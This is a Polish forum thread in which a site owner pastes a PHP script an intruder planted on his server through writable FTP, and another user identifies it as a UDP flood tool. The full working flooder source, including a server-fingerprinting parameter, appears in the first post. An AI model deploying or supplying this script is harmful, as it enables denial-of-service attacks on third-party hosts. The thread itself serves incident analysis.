![]() |
![]() ![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 26.08.2012 Ostrzeżenie: (0%) ![]() ![]() |
Nie jestem majstrem od PHP więc dlatego zwracam się do forumowiczów w trybie pilnym poprzedni admin był dość niekompetętny i na ftp'ie publicznym zostawił prawo do zapisu i ktoś wrzucił owy skrypcik
<?php set_time_limit(999999); $host = $_GET['host']; $port = $_GET['port']; $exec_time = $_GET['time']; $Sendlen = 65535; $packets = 0; ignore_user_abort(True); if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ if (StrLen($_GET['rat'])<>0){ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; } echo "Warning to: opening"; exit; } for($i=0;$i<$Sendlen;$i++){ $out .= "A"; } $max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Send Host��$host:$port<br><br>"; echo "Send Flow��$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; echo "Send Rate��" . round($packets/$exec_time, 2) . " packs/s��" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; ?> nie wiem co owy skrypt robi(na PHP to się prawie w ogóle nie znam) ale myślę że to jakaś podła gadzina proszę o pomoc bo leżał tam ze dwa miechy więc chcę wiedzieć jakie to coś może nieść zagrożenia zwłaszcza dla serwera no dla maszyn klienckich również |
|
|
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 97 Pomógł: 15 Dołączył: 12.08.2012 Skąd: Zabrze Ostrzeżenie: (10%) ![]() ![]() |
Kod PHP dodawaj w odpowiednich tagach.
Ten kod wykonuje UDP flood na podany host oraz port przez określoną ilość czasu. Tak nawiasem kod generuje duuużą ilość E_NOTICE, a jego autor nie wie co to isset() oraz nie zna działania pętli while. ![]() Masz szczęście, że trafiłeś na jakiegoś scriptkiddie/lame haksiora, bo straty mogłyby być dużo większe. |
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 26.08.2012 Ostrzeżenie: (0%) ![]() ![]() |
Kod PHP dodawaj w odpowiednich tagach. Ten kod wykonuje UDP flood na podany host oraz port przez określoną ilość czasu. Tak nawiasem kod generuje duuużą ilość E_NOTICE, a jego autor nie wie co to isset() oraz nie zna działania pętli while. ![]() Masz szczęście, że trafiłeś na jakiegoś scriptkiddie/lame haksiora, bo straty mogłyby być dużo większe. Dziękuję Ci niezmiernie bardzo a czy mógł za pomocą tego dobić się do Bazy SQL albo nie daj Bóg kont shellowych bo jeśli nie to chwała mu za jego niewiedzę , czyli z tego co rozumiem to atakował stacje klienckie zalewając im UDP ramkami ![]() |
|
|
![]()
Post
#4
|
|
Grupa: Zarejestrowani Postów: 97 Pomógł: 15 Dołączył: 12.08.2012 Skąd: Zabrze Ostrzeżenie: (10%) ![]() ![]() |
Nie, to zwykły flooder + wyświetlanie rzeczy które i tak są ogólnodostępne.
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 20.08.2025 - 11:46 |